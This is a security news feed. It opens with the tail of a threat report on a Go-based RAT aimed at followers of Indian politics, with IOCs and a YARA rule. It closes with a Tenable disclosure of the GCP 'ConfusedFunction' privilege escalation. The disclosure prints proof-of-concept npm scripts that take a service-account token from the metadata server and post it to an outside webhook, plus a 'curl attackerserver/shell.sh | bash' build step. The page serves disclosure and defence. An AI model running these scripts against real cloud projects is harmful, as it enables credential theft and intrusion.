into four sections:  Execution Prevention Based on geo-location  De-obfuscating strings through character manipulation  Self-deleting an LNK file and creating and opening a lure document  Creating and executing a malicious DLL file   Execution Prevention Based on geo-Location  The initial section of the PowerShell script in the LNK file is designed to prevent execution in specific countries. It retrieves the victim’s system''s GeoID using the “Get-WinHomeLocation” command. If the GeoID matches any of the specified values listed in the table below, the script terminates its execution. These checks are intended to exclude the threat actors’ specified locations or countries from this attack. The table below shows the GeoID and the respective locations.  Geographical identifier  Locations  3  Afghanistan  5  Azerbaijan  7  Armenia  29  Belarus  130  Kyrgyzstan  137  Kazakhstan  152  Moldova  154  Mongolia  203  Russia  228  Tajikistan  238  Turkmenistan  247  Uzbekistan  Next, the script begins to de-obfuscate an array of strings. This array contains five strings, as shown in the image below, each of which represents obfuscated data, including base64-encoded strings, PowerShell commands, and URLs necessary for the subsequent stages of the infection chain.   Figure 4 - Obfuscated strings  The image below shows the de-obfuscated strings.  Figure 5 – De-obfuscated strings  The next section of the PowerShell script is intended to delete the original LNK file and open a lure document. The image below displays the code responsible for generating the document.  Figure 6 - Generating lure document  Before creating the lure document, the script first searches the current directory for any "".LNK"" files that have the same size as the original LNK file. If any such files are found, the script deletes them and then writes the base64-decoded content to a new file with the same name as the original LNK file but with a "".docx"" extension.  Lure Document:  The script then opens the newly created lure document, which appears to be a question posed to the Indian parliament, submitted by a member of the Rajya Sabha or “Council of States” in India. The image below shows the lure document.  Figure 7 - Lure document  Based on the lure document, it is evident that the Threat Actor (TA) is targeting individuals who have a specific interest in Indian political affairs. This suggests a strategic approach to select victims who are likely to be involved in or have significant knowledge regarding political matters in India. The targeted individuals may include government officials, political analysts, journalists, researchers, or think tanks who closely follow parliamentary proceedings.  The final section of the PowerShell script is designed to load a malicious binary file (DLL) decoded from base64 in two ways. The first method loads and executes the DLL content directly in memory using ""Reflection.Assembly"" without writing it to disk. The second method serves as a fallback if the direct in-memory execution fails. It writes the DLL content to a file into the “%temp%” directory as “daephaphahph.dll“ and then loads it. The image below shows the code responsible for loading the DLL file.  Figure 8 - Loading malicious binary file  Once the DLL file is loaded into PowerShell''s memory, it uses the previously de-obfuscated URLs for further execution. The image below demonstrates the PowerShell script executing methods within the loaded DLL file, passing the URLs as parameters along with the Username and UserDomain.  Figure 9 - PowerShell Script calls DLL methods  The loaded .NET assembly file functions as a shellcode loader, first determining the victim''s system architecture. If the system supports 64-bit architecture, the malware retrieves a PNG file named ""x86_64.png"". For a 32-bit system, it fetches a PNG file named ""x86.png"" using the URLs passed to the function, as illustrated in the figure below.  Figure 10 - System Architecture Check  Steganography Technique  Upon successfully obtaining the PNG content, the DLL file proceeds to parse the PNG file and decompress the hidden GZip content present within the image, as shown below.   During the course of our research, we observed that this image also appeared on a predominantly Russian-speaking social media platform. The TA may have altered this image to help deliver malware, leading us to suspect that they could also be of Russian origin.   Figure 11 - Steganography PNG Image  The decompressed stream contains shellcode and an MZ header, as shown in the image below. The shellcode is generated using Donut - an open-source project.   Figure 12 – Shellcode along with final Payload  APC (Asynchronous Procedure Call) Injection:  The .NET loader executes the shellcode using the APC injection method. The APIs required for the injection are encrypted, base64 encoded and stored in the binary as hardcoded strings. The loader retrieves the API names by performing a simple XOR operation, passing the encrypted string and key as parameters to a function, as shown below. Figure 13 - XOR operation to decrypt strings  After getting the APIs required for injection, the .NET DLL creates a new process called ""powershell.exe"" in a suspended state using the CreateProcess() API with the CREATE_SUSPENDED flag. This ensures that the “powershell.exe” process is created but does not start executing immediately. Then, it uses the WriteProcessMemory() API to write the shellcode and the PE (Portable Executable) file extracted from the PNG file into the memory space of the suspended “powershell.exe” process.  Subsequently, it uses the QueueUserAPC() API to queue an Asynchronous Procedure Call (APC) to a thread within the suspended process. The queued APC will execute the shellcode when the thread enters a resume state.  Finally, the DLL calls the ResumeThread() API to resume the main thread of the suspended process, causing it to execute the queued APC and thereby run the injected shellcode, as shown below. The shellcode subsequently loads and executes the embedded binary, facilitating further malicious activities.  Figure 14 - Invoking Resumethread Win32 Api  Final payload The final payload is a Go-compiled file with a size of approximately 8.4 MB. The following publicly available Go utilities are utilized in this binary:  HashiCorp Yamux – This is a multiplexing library for Golang that operates over a reliable and ordered underlying connection, such as TCP or Unix domain sockets. The TA is abusing Yamux to multiplex multiple communication streams over a single connection, making their network traffic less conspicuous.  Secsy goftp – It’s an open-source High-level FTP client utilized by TA to facilitate file transfers or downloads on a compromised system.  Despite the complexity of reverse-engineering Go binaries, we successfully obtained insights through the examination of memory strings. Further analysis revealed several memory strings that confirm the malware''s behavior as a Remote Access Trojan (RAT). The RAT executes the following commands.   Command  Description  discover/walker  Traverse directories to collect information about files and directories.  filesys/append  Appends data to a file.  filesys/create  Creates a new file.  filesys/delete  Deletes a file.  filesys/lsdir  Lists files in the directory.  filesys/mkdir  Creates a new directory.  filesys/read  Reads data from a file.  filesys/rename  Renames a file.  filesys/truncate  Truncates a file to a specified size.  filesys/write  Writes data to a file.  interact  Engages in interactive communication with a C&C server.  command  Executes a command, likely on a remote system.  network/listen  Listens for incoming network connections.  network/tlsdial  Establishes a network connection using TLS encryption.  persist  Creates persistence  process/kill  Terminates a process  ransom  Deploy Ransomware  stager/earlybird  Executes early-stage payload  sysinfo/curuser  Retrieves information about the current user.  sysinfo/install  Gathers installation-related information.  sysinfo/network  Collects network-related information.  sysinfo/osvers  Retrieves the operating system version information.  discover/tcpscan  Scans for open TCP ports on a network.  upload/post  Uploads data, possibly via HTTP POST requests.  upload/ftpc  Uploads data using FTP (File Transfer Protocol).  tools/sharphound  Performs Active Directory Enumeration  tools/mimikatz  extracts plaintext passwords, hashes, PINs, and Kerberos tickets from lsass.exe memory  tools/rubeus  Facilitates Kerberos ticket extraction, manipulation, and pass-the-ticket attacks.  C&C Communication:  The RAT connects to its Command & Control (C&C) server via a WebSocket connection on port 443. Utilizing WebSockets over port 443, which is usually designated for secure HTTPS traffic, helps the RAT bypass traditional network security measures, as WebSocket traffic is often less monitored and more challenging to detect compared to standard HTTP or other protocols.  The RAT initiates a GET request to “wss://use1.netcatgroup.site/ctrl/”, seeking to use a custom subprotocol called “NetCat.” The custom “NetCat” subprotocol suggests that the RAT may be using Netcat-like features for establishing a reverse shell, transferring data, executing commands, or performing remote control operations. The below figure shows the communication to its C&C server.  Figure 15 -C&C communication Threat Actor Attribution  The threat actor appears to avoid infecting systems in nations where Russian is either the official language or spoken widely, suggesting a deliberate self-imposed restriction. This strategy is likely intended to mitigate potential backlash or reduce exposure in regions where they may have a presence or be known. Such tactics are commonly observed among Ransomware-as-a-Service (RaaS) groups.   Additionally, the original, unedited image that the TA later altered via steganography was posted on a social media platform commonly used by Russian-speaking users, yet another factor that may indicate that the TA is either a Russian speaker or group.    Based on the available evidence, we cannot attribute this activity to any specific threat actor or Advanced Persistent Threat (APT) group at this time. However, the nature of the attack and its operational patterns indicate that it may be the work of a financially motivated group. The observed linguistic and operational characteristics lead us to suspect that the perpetrators could be a Russian-speaking group or a RaaS entity.  Conclusion  This campaign demonstrates a highly sophisticated attack that utilizes a shortcut file (.LNK) to execute PowerShell commands, which then deploys a .NET loader and a malicious payload concealed within a PNG file using steganography. The final payload, a RAT written in Go, facilitates remote access and potential ransomware deployment.   The threat actor’s intentional avoidance of Russian-speaking nations indicates a strategy to minimize detection and backlash. Additionally, targeting individuals interested in Indian political affairs suggests a calculated approach. Although we cannot precisely attribute the activity to a specific threat actor or APT group, the evidence suggests it is likely the work of a financially motivated, Russian-speaking group or Ransomware-as-a-Service (RaaS) entity.  Recommendations  This campaign reaches users via potential phishing campaigns, so exercise extreme caution when handling email attachments and external links. Always verify the legitimacy of the sender and links before opening them.   Monitor network traffic, even if it appears to come from trusted CDNs. It’s important to correlate and verify the traffic before allowing it.  Consider disabling or limiting the execution of scripting languages on user workstations and servers if they are not essential for legitimate purposes.  Implement application whitelisting to ensure only approved and trusted applications and DLLs can execute on your systems  Segment your organization’s networks to limit the spread of malware  Deploy strong antivirus and anti-malware solutions to detect and remove malicious files.   MITRE ATT&CK® Techniques  Tactic  Technique  Procedure  Initial Access (TA0001)    Spearphishing Attachment (T1566.001)    .LNK file shared as mail attachments  Execution (TA0002)  User Execution: Malicious File (T1204.002)  User opens an .LNK file as a file pretending to be an Office Document  Execution (TA0002)  Command and Scripting Interpreter: PowerShell (T1059.001)  Embedded PowerShell commands executed    Defense Evasion (TA0005)  Masquerading: Masquerade File Type (T1036.008)  LNK file disguised as a legitimate office file   Discovery (TA0007)  System Location Discovery (T1614)  Checks GeoLocation using (Get-WinHomeLocation).GeoID  Defense Evasion (TA0005)  Indicator Removal: File Deletion (T1070.004)  Self-Deleting .LNK file after execution   Defense Evasion (TA0005)  System Information Discovery  (T1082)  Checking for System architecture using “Int.ptr”   Command and Control (TA0011)  Obfuscated Files or Information: Steganography (T1027.003)  Malicious GZip compressed stream is hidden inside a PNG file   Defense Evasion (TA0005)  De-obfuscate/Decode Files or Information (T1140)  API and other program strings are obfuscated   Execution (TA0002)  Native API (T1106)  CreateProcess(),QueueUserAPC() used for Process Injection  Privilege   Escalation  (TA0004)   Process Injection: Asynchronous Procedure Call (T1055.004)   Using QueueUserAPC, it injects the shellcode into powershell.exe  C&C  (TA0011)   Application Layer Protocol: Web Protocols (T1071.001)  Stealer communicates with the C&C server.  Indicators Of Compromise  Indicators   Indicator Type  Description  ffe5b09cbc0073be33332436150c81edfa952d2af749160699fc8b10b912ef35  SHA256  Zip attachement  6f4dc0d9fe5970586403865d551bbea13e2ceb1bfe41f22e235a6456a5ec509b  SHA256  LNK File  168182578da46de165d10e6753d1c7db7b214efc723c89c6d9d0038264abad54  SHA256  Dropped DLL file  8edc8f3eed761694c6b1df740de376f9e12f82675df7507417adb2c8bbedd8da  SHA256  x86.png  ac957c501867a86c13045fa72d53faacb291cc8b6b2750915abc1b5815b164c6  SHA256  x86_64.png  c42ea4d3c8b6ae2c4727a11de65f624a70dabba46c1996aa545de35a58804802  SHA256  Final injected payload PE file (32-bit)  83d6e377a5527f41d8333f8eb0d42f7c6a24f8694ed3caceb3a1e63de7b23e9d  SHA256  Final injected payload PE file (64-bit)  aef4d36ce252a9181767f263b1cbd831ac79f6e80516aa640222f9c56b06de4f  SHA256  PE file with ShellCode  hxxps://suquaituupie.global.ssl.fastly[.]net/static/x86.png?u=  URL  PNG file contains GZip stream  hxxps://suquaituupie.global.ssl.fastly[.]net/static/x86_64.png?u=  URL  PNG file contains GZip stream  use1.netcatgroup[.]site  Domain  C&C  suquaituupie.global.ssl.fastly[.]net  Domain  C&C  Yara Rule rule Go_based_RAT { meta: author = ""Cyble Research and Intelligence Labs"" description = ""Detects RAT written in GO"" date = ""2024-07-24"" os = ""Windows"" strings: $a = ""network/tlsdial"" nocase wide ascii $b = ""tools/sharphound"" nocase wide ascii $c = ""process/kill"" nocase wide ascii $d = ""sysinfo/osvers"" nocase wide ascii $e = ""process/kill"" nocase wide ascii condition: uint16(0) == 0x5A4D and all of them } References:  https://www.linkedin.com/pulse/malware-w-skr%C3%B3cie-lnk-ireneusz-tarnowski The post Operation ShadowCat: Targeting Indian Political Observers via a Stealthy RAT appeared first on Cyble.

by CYBLE

2024-07-24 13:30:58

KnowBe4 mistakenly hires North Korean hacker, faces infostealer attack

American cybersecurity company KnowBe4 says a person it recently hired as a Principal Software Engineer turned out to be a North Korean state actor who attempted to install information-stealing on its devices. [...]

by BleepingComputer

2024-07-24 13:30:33

Vanta raises $150 million accelerate its AI product innovation

Vanta announced that it has raised a $150 million Series C funding round at a valuation of $2.45 billion. The round was led by Sequoia Capital, in addition to new investors Growth Equity at Goldman Sachs Alternatives, J.P. Morgan and existing investors Atlassian Ventures, Craft Ventures, CrowdStrike Ventures, HubSpot Ventures, Workday Ventures and Y Combinator. The most recent funding brings Vanta’s total funds raised to $353 million since 2021. Vanta intends to use the funding … More → The post Vanta raises $150 million accelerate its AI product innovation appeared first on Help Net Security.

by Help Net Security

2024-07-24 13:29:21

Organizations Warned of Exploited Twilio Authy Vulnerability

CISA warns of the in-the-wild exploitation of CVE-2024-39891, a Twilio Authy bug leading to the disclosure of phone number data. The post Organizations Warned of Exploited Twilio Authy Vulnerability appeared first on SecurityWeek.

by SecurityWeek

2024-07-24 13:21:08

57,000 Patients Impacted by Michigan Medicine Data Breach

Michigan Medicine is notifying roughly 57,000 individuals of a data breach impacting their personal and health information. The post 57,000 Patients Impacted by Michigan Medicine Data Breach appeared first on SecurityWeek.

by SecurityWeek

2024-07-24 13:00:00

Crisis communication: What NOT to do

Read the 1st blog in this series, Cybersecurity crisis communication: What to do When an organization experiences a cyberattack, tensions are high, customers are concerned and the business is typically not operating at full capacity. Every move you make at this point makes a difference to your company’s future, and even a seemingly small mistake can […] The post Crisis communication: What NOT to do appeared first on Security Intelligence.

by Security Intelligence

2024-07-24 12:41:28

Siemens Patches Power Grid Product Flaw Allowing Backdoor Deployment

Siemens has released out-of-band updates to patch two potentially serious vulnerabilities in products used in energy supply.  The post Siemens Patches Power Grid Product Flaw Allowing Backdoor Deployment appeared first on SecurityWeek.

by SecurityWeek

2024-07-24 12:15:00

How CISO roles have evolved with GRC

As cyberattacks become a top-of-mind concern CISOs are having to step up their c-suite presence, prepare for strict reporting requirements, and deal with rising stakes.

by Hack The Box Blog

2024-07-24 12:09:46

Google Chrome now warns about risky password-protected archives

Google Chrome now warns when downloading risky password-protected files and provides improved alerts with more information about potentially malicious downloaded files. [...]

by BleepingComputer

2024-07-24 11:58:09

Paris Wi-Fi Security Study | Kaspersky official blog

Kaspersky experts investigated the security of public Wi-Fi access points in Paris ahead of the Olympics.

by Kaspersky

2024-07-24 11:52:00

Mimecast to buy insider threat specialist Code42

by ComputerWeekly

2024-07-24 11:45:00

Microsoft Defender Flaw Exploited to Deliver ACR, Lumma, and Meduza Stealers

A now-patched security flaw in the Microsoft Defender SmartScreen has been exploited as part of a new campaign designed to deliver information stealers such as ACR Stealer, Lumma, and Meduza. Fortinet FortiGuard Labs said it detected the stealer campaign targeting Spain, Thailand, and the U.S. using booby-trapped files that exploit CVE-2024-21412 (CVSS score: 8.1). The high-severity

by The Hacker News

2024-07-24 11:43:52

Dazz snaps up $50M for AI-based, automated cloud security remediation

The startup is not disclosing its valuation, but sources close to the company say the figure is just under $400 million post-money. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

2024-07-24 11:42:30

Streamline your cybersecurity and compliance efforts at scale

To streamline your compliance efforts and scale your cybersecurity program, you need to save time and money while consolidating effort. Here''s how resources from the Center for Internet Security® (CIS®) can help.

by SC Media

2024-07-24 11:26:00

CISA Adds Twilio Authy and IE Flaws to Exploited Vulnerabilities List

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerabilities are listed below - CVE-2012-4792 (CVSS score: 9.3) - Microsoft Internet Explorer Use-After-Free Vulnerability CVE-2024-39891 (CVSS score: 5.3) - Twilio Authy Information Disclosure

by The Hacker News

2024-07-24 11:01:49

GitLab Customers Hope to Stay Out of the Doghouse if Acquired by Datadog

Rumors of Datadog acquiring GitLab could reshape the DevOps landscape by consolidating CI/CD and monitoring tools, offering a seamless experience but posing integration challenges.

by ITPro Today

2024-07-24 11:01:06

Stargazers Ghost Network

Research by: Antonis Terefos (@Tera0017) Key Points Introduction Threat actors continually evolve their tactics to stay ahead of detection. Traditional methods of malware distribution via emails containing malicious attachments are heavily monitored, and the general public has become more aware of these tactics. Recently, Check Point Research observed threat actors using GitHub to achieve initial […] The post Stargazers Ghost Network appeared first on Check Point Research.

by Check Point Research

2024-07-24 11:00:00

A Hacker ‘Ghost’ Network Is Quietly Spreading Malware on GitHub

Cybersecurity researchers have spotted a 3,000-account network on GitHub that is manipulating the platform and spreading ransomware and info stealers.

by WIRED Security News

2024-07-24 10:59:51

Windows SmartScreen Flaw Enabling Data Theft in Major Stealer Attack

New Stealer Campaign Exploits Windows SmartScreen Vulnerability (CVE-2024-21412) – This large-scale attack targets Windows users, stealing passwords, browsing…

by Hackread

2024-07-24 10:37:06

CrowdStrike software crash linked to undetected error in content update for Windows users

The company plans to add additional testing and employ canary delivery methods to safeguard customers from future disruptions.

by Cybersecurity Dive

2024-07-24 10:30:00

This Machine Exposes Privacy Violations

A former Google engineer has built a search engine, webXray, that aims to find illicit online data collection and tracking—with the goal of becoming “the Henry Ford of tech lawsuits.”

by WIRED Security News

2024-07-24 10:16:44

CrowdStrike: 'Content Validator'' bug let faulty update pass checks

CrowdStrike released a Preliminary Post Incident Review (PIR) on the faulty Falcon update explaining that a bug allowed bad data to pass its Content Validator and cause millions of Windows systems to crash on July 19, 2024. [...]

by BleepingComputer

2024-07-24 10:09:37

China-linked APT group uses new Macma macOS backdoor version

China-linked APT group Daggerfly (aka Evasive Panda, Bronze Highland) Evasive Panda has been spotted using an updated version of the macOS backdoor Macma. The China-linked APT group Daggerfly (aka Evasive Panda or Bronze Highland) has significantly updated its malware arsenal, adding a new malware family based on the MgBot framework and an updated Macma macOS backdoor. […]

by Security Affairs

2024-07-24 10:05:04

Suspected Scattered Spider member apprehended

Such an arrest, which was based on suspected Blackmail and Computer Misuse Act violations and also resulted in the sequestration of the teen''s digital devices.

by SC Media

2024-07-24 10:03:53

US-based lawsuits against NSO Group supported by leading tech firms

Numerous major U.S. tech firms, including Microsoft and Google, have issued an amicus brief supporting NSO Group victims'' filing of lawsuits against the Israeli spyware firm.

by SC Media

2024-07-24 10:01:11

Hot topics: Can’t-miss sessions at Mandiant’s 2024 mWISE event

Now that the mWISE 2024 session catalog is out, it''s time to take a closer look at the topics. Learn more from @mWISEConference about the three hottest tracks in this year''s conference. [...]

by BleepingComputer

2024-07-24 10:01:01

Unprecedented global cyberattack prevalence reported in Q2

Such unprecedented increase in cyberattack prevalence has been fueled by increasingly sophisticated threat actors and advancements in artificial intelligence and machine learning, an analysis from Check Point revealed.

by SC Media

2024-07-24 10:00:05

A (somewhat) complete timeline of Talos’ history

Relive some of the major cybersecurity incidents and events that have shaped Talos over the past 10 years.

by Cisco Talos Blog

2024-07-24 10:00:00

Accelerating Analysis When It Matters

Malware analysts demonstrate how to triage and analyze large amounts of samples with greater efficiency. Samples include Remcos RAT, Lumma Stealer and more. The post Accelerating Analysis When It Matters appeared first on Unit 42.

by Palo Alto Networks - Unit42

2024-07-24 09:20:51

Unlocking cyber insurance savings to fund MDR

Redirecting risk reduction spend from cyber insurance to MDR services is a win-win, resulting in better protection and lower cost coverage.

by Sophos News

2024-07-24 09:00:00

Microservices vs. Monoliths: Which Are More Secure?

Microservices offer security advantages by isolating application components, but they also introduce complexities and vulnerabilities that may outweigh these benefits.

by ITPro Today

2024-07-24 09:00:00

ConfusedFunction: A Privilege Escalation Vulnerability Impacting GCP Cloud Functions

Organizations that have used Google Cloud Platform’s Cloud Functions – a serverless execution environment – could be impacted by a privilege escalation vulnerability discovered by Tenable and dubbed as “ConfusedFunction.” Read on to learn all about the vulnerability and what your organization needs to do to protect itself.Tenable Research has discovered a vulnerability in Google Cloud Platform involving its Cloud Functions serverless compute service and its Cloud Build CI/CD pipeline service.Specifically, we discovered that when a GCP user creates or updates a Cloud Function, a multi-step backend process is triggered. This process, among other things, attaches a default Cloud Build service account to the Cloud Build instance that is created as part of the function’s deployment. This process happens in the background and isn’t something that ordinary users would be aware of.This default Cloud Build service account gives the user excessive permissions. An attacker who gains access to create or update a Cloud Function can take advantage of the function’s deployment process to escalate privileges to the default Cloud Build service account.The attacker could leverage the high privileges of the default Cloud Build service account in other GCP services that are created when a Cloud Function is created or updated, including Cloud Storage, and Artifact Registry or Container Registry.After Tenable reported the vulnerability to GCP, GCP confirmed it and remediated ConfusedFunction to some extent for Cloud Build accounts created after mid-June 2024. However, remediation efforts did not address existing Cloud Build instances.The ConfusedFunction vulnerability highlights the problematic scenarios that may arise due to software complexity and inter-service communication in a cloud provider''s services. Specifically, to support backward compatibility, GCP has not changed the privileges from Cloud Build service accounts created before the fix was implemented. This means that the vulnerability is still affecting existing instances.It’s also worth mentioning that while the GCP fix has reduced the severity of the problem for future deployments, it didn’t completely eliminate it. That’s because the deployment of a Cloud Function still triggers the creation of the aforementioned GCP services. As a result, users must still assign minimum but still relatively broad permissions to the Cloud Build service account as part of a function’s deployment.So if you use Cloud Functions, we highly recommend monitoring and taking preventive action in this scenario, since attackers could still use it as a tactic, technique and procedure (TTP).We want to thank Google Cloud for its cooperation and quick response.How to remediate this vulnerabilityFor every cloud function using the legacy Cloud Build service account, replace it with a least-privilege service account. More details on how Tenable can help can be found at the end of this blog.What are Cloud Functions?Cloud Functions in GCP are event-triggered, serverless functions. They automatically scale and execute code in response to specific events like HTTP requests or data changes. The first generation offered basic event handling, while the second generation improved language options, runtime customization and overall flexibility for more complex applications.ConfusedFunction vulnerability detailsWhen creating a new Cloud Function or updating an existing one, GCP initiates a deployment process behind the scenes. The vulnerability affects both first- and second-generation Cloud Functions. We will focus our description of the vulnerability on the first gen deployment process as it is less complicated than that of the second gen, which includes additional GCP services.Following the Cloud Function deployment trigger, a service agent saves the Cloud Function’s source code to a Cloud Storage bucket, and a Cloud Build instance orchestrates the function’s deployment. It does so by building the Cloud Function code into a container image and pushing the image to a Container Registry or an Artifact Registry.But how does this Cloud Build instance perform privileged actions within your Google Cloud project?Tenable Research noticed that the Cloud Build instance that GCP creates for the Cloud Function deployment has the default Cloud Build service account attached to it. This service account comes along with some interesting permissions. This attachment process is hidden behind the scenes, just like the deployment process initiation is. The only way a user can change the service account of the Cloud Build function deployment instance is by editing it after it has already been created. An important note: As you would expect, the only permissions a user needs to be able to create or update a Cloud Function are function permissions, but the Cloud Build instance, Cloud Storage bucket and Artifact Registry image in the user''s account – all of which GCP creates for orchestration needs – require additional privileges.GCP creates these background services through the use of service agents and the default Cloud Build service account. In terms of identity and access management (IAM), a user who has access to Cloud Functions should not have IAM permissions to the services included in the function’s orchestration.While inspecting the Cloud Build instance created when Tenable Research deployed the function, we looked for a sink – potentially dangerous endpoints where injected malicious data can lead to adverse effects, such as code execution – controlled by user input or any other controllable source that would enable code to run in the Cloud Build instance and escalate privileges from Cloud Function permissions to the default Cloud Build service account’s permissions.To this end, we encountered the following ""npm install"" command in the Cloud Build instance logs correlated to our node.js function:  Cloud Build installs the function''s dependencies, which we can control with our function permissions. Looks like a perfect candidate for privilege escalation!We can now create a new Cloud Function or edit an existing one, set our “malicious” dependency in the function''s dependencies file and let the deployment do its job.Here’s package.json example in a node.js function:{ ""dependencies"": { ""@google-cloud/functions-framework"": ""^3.0.0"", ""mypocmaliciouspackage"": ""^1.0.0"" } }The deployment process will start, and the Cloud Build instance correlated to our function deployment will run its build commands, including the ""npm install"" command that will install our malicious dependency. This process works the same and affects all of the Cloud Functions'' runtime environments.Our goal was to run code on the Cloud Build instance. We can do that using a preinstall script in our malicious dependency that will force the Cloud Build instance to run our code. Here’s our malicious dependency example:{ ""name"": ""mypocmaliciouspackage"", ""version"": ""4.0.0"", ""description"": ""poc"", ""main"": ""index.js"", ""scripts"": { ""test"": ""echo ''testa''"", ""preinstall"": ""access_token=$(curl -H ''Metadata-Flavor: Google'' ''http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/134567893333@cloudbuild.gserviceaccount.com/token'');curl -X POST -d $access_token https://tenable-webhook.com"" }, ""author"": ""me"", ""license"": ""ISC"" }This code will then extract the default Cloud Build service account token, which GCP automatically attached, from the metadata of the Cloud Build instance:  Finally, we can use this token to impersonate the identity of the default Cloud Build service account and escalate our privileges from Cloud Function to the permissions of the service account.  Full attack reproductionSteps to reproducing this technique with a Node.js function runtime as an example:Run npm init.A package will be created in your current folder. Change the package.json code to the following:{ ""name"": ""mypocmaliciouspackage"", ""version"": ""4.0.0"", ""description"": ""poc"", ""main"": ""index.js"", ""scripts"": { ""test"": ""echo ''testa''"", ""preinstall"": ""access_token=$(curl -H ''Metadata-Flavor: Google'' ''http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/134567893333@cloudbuild.gserviceaccount.com/token'');curl -X POST -d $access_token https://webhook.com"" }, ""author"": ""me"", ""license"": ""ISC"" }Run npm publish --scope public. (Please note that this will result in the package being published to the public npm registry.)Create a new Cloud Function or update an existing one with an identity that has function permissions.Pick a Node.js runtime and edit the package.json with your malicious package:{ ""dependencies"": { ""@google-cloud/functions-framework"": ""^3.0.0"", ""mypocmaliciouspackage"": ""^1.0.0"" } }Deploy the Cloud Function. The Cloud Build will run, your malicious package will be installed, and the preinstall script of the malicious package will exfiltrate the GCP token of the default Cloud Build service account from the metadata of the Cloud Build instance to your webhook.The aftermath: More ways for exploitationLater in the research, we found more ways to leak the default Cloud Build service account token in the function deployment process. One of them is through the npm build start script.As a part of the build process, the Cloud Build instance uses build scripts.The problematic scenario here is similar to ConfusedFunction: Cloud Build scripts are controlled through the source code of the Cloud Function.Identities with permission to update or create a function can run code in the build process of Cloud Build by inputting malicious code in the start build script.From there, the exploitation process is the same. Attackers can inject the malicious build script in the package.json/requirements.txt of the function (depending on the runtime environment of the Cloud Function).The default Cloud Build service account can be abused, and its token can be exfiltrated by accessing the metadata of the Cloud Build instance with the code ran by the malicious build script.Steps to reproduce with Node.js runtime:Change the package.json to the following and host your malicious script/reverse shell in shell.sh: { ""dependencies"": { ""@google-cloud/functions-framework"": ""^3.0.0"" }, ""scripts"": { ""gcp-build"": ""curl -s http://attackerserver/shell.sh | bash"" } }Deploy the function.The vulnerability fix and extra steps taken by GCP to enhance overall securityIn response to the disclosure of the identified vulnerabilities, GCP deployed solutions to enhance the security of Google Cloud Functions and Cloud Build service accounts in general. In mid-June, GCP added an option in Cloud Functions that involves using a custom service account for the Cloud Build instance deployed as part of the function deployment process. This service account should be tailored to the specific requirements of the Cloud Functions deployment. This form of deployment is more secure.Before the fix, the customer didn’t have visibility and control over the default Cloud Build service account, as it was attached automatically to the Cloud Build instance as part of the function deployment process. More details about the fix can be found in this recent update to the GCP documentation.Extra steps taken by Google CloudGoogle Cloud deployed another update for Cloud Build over the months. of May and June, as an additional response to the ConfusedFunction finding. This update changed the default behavior of Cloud Build and of the default Cloud Build service account. In late June, additional organization policies were released to allow organizations full control over which service account Cloud Build uses by default.These are the changes for new and existing projects that enable the Cloud Build API release deployed over the months of May and June 2024:Existing Cloud Build service accounts are referred to from now on as legacy Cloud Build service accounts.Projects use the Compute Engine service account by default for directly submitted builds.Projects have to explicitly specify a service account when you create a new trigger.The behavior for existing projects that enable the Cloud Build API before the changes were introduced remain unchanged by default.For organizations, you can adjust the organization policies to control which service account Cloud Build uses by default.More information on the new organization policies introduced by Google Cloud and the updates can be found here.By adopting these fixes, you can systematically enhance the security posture of your Google Cloud environment.ConclusionCloud providers use their core services as the foundation of more popular customer-facing offerings, so one click in the console can create many different resources in the account in the background that you may not be aware of. In the ConfusedFunction vulnerability, this design pattern was the root cause of this vulnerability.Software complexity and inter-service communication make it difficult to protect and secure modern applications. As more and more services are included in the process, vulnerabilities and misconfigurations are likely to occur.In addition, these types of vulnerabilities, and common misconfigurations based on the same concepts, also tend to confuse customers with regards to where they sit in the shared responsibility model. Even though those resources were created by the cloud provider, their security is the customer’s responsibility because these resources are in the customer’s account.In this post, we showed a technique for abusing the permissions of the Cloud Function deployment to elevate privileges. By sharing our process, we hope to educate the security community regarding the complexity of Cloud Function internal workings and the many nuances of IAM risk. How can Tenable Cloud Security help?The Tenable Cloud Security team will launch a feature to help customers eliminate the risks described in this blog post in August 2024. The feature will alert customers on excessive IAM permissions and the use of the default Cloud Build service account, while considering the use and risks of Cloud Functions.Due to the complexity of cloud infrastructure, IAM misconfigurations are inevitable and, as we saw in this post, can pose a huge risk. The Tenable Cloud Security CNAPP solution can help by identifying exactly which resources an identity can access or, conversely, how a resource is exposed including risks such as privilege escalation, and automatically generate least-privilege policies that eliminate the risky permissions. Tenable Research is here to helpFeel free to contact Tenable Research with any questions or concerns you have about cloud security.

by Tenable

2024-07-24 07:20:23

Kematian Stealer Technical Analysis

In the ever-evolving world of cybersecurity, new threats emerge constantly, challenging our defenses and requiring continuous vigilance. One such threat that has recently come to light is the “Kematian Stealer,” an advanced information-stealing malware. ThreatMon’s Kematian Stealer Technical Analysis Report aims to provide an in-depth analysis of this potent malware, its features, and the mitigation […] The post Kematian Stealer Technical Analysis appeared first on ThreatMon Blog.

by ThreatMon

2024-07-24 06:40:19

Windows July security updates send PCs into BitLocker recovery

Microsoft warned that some Windows devices will boot into BitLocker recovery after installing the July 2024 Windows security updates. [...]

by BleepingComputer

2024-07-24 02:15:26

Exploiting Broken Authentication Control In GraphQL

Overview The implementation of GraphQL in enterprise systems has grown rapidly. A recent report from Gartner predicted that at least 50% of enterprises will be implementing GraphQL in their production environments by the end of the calendar year. With its increasing adoption, correctly accounting for the security of GraphQL APIs becomes increasingly pertinent.  Although the […] The post Exploiting Broken Authentication Control In GraphQL appeared first on Praetorian.

by Praetorian

2024-07-24 00:29:59

Recursive Amplification Attacks: Botnet-as-a-Service

Introduction On a recent client engagement, we tested a startup’s up-and-coming SaaS data platform and discovered an alarming attack path. The specific feature names and technologies have been generalized to anonymize the platform. Like many data platforms, various source types could be configured to ingest data, such as third-party CRM or marketing services. The platform […] The post Recursive Amplification Attacks: Botnet-as-a-Service appeared first on Praetorian.

by Praetorian

2024-07-24 00:00:00

BreachForums v1 database leak is an OPSEC test for hackers

The entire database for the notorious BreachForums v1 hacking forum was released on Telegram Tuesday night, exposing a treasure trove of data, including members'' information, private messages, cryptocurrency addresses, and every post on the forum. [...]

by BleepingComputer

2024-07-23 21:54:33

Biggest trial court in the US closed after ransomware attack

The Los Angeles County Superior Court remained closed on Monday as it tried to recover from a ransomware attack.

by ThreatDown

2024-07-23 21:47:45

FrostyGoop ICS malware targets Ukraine

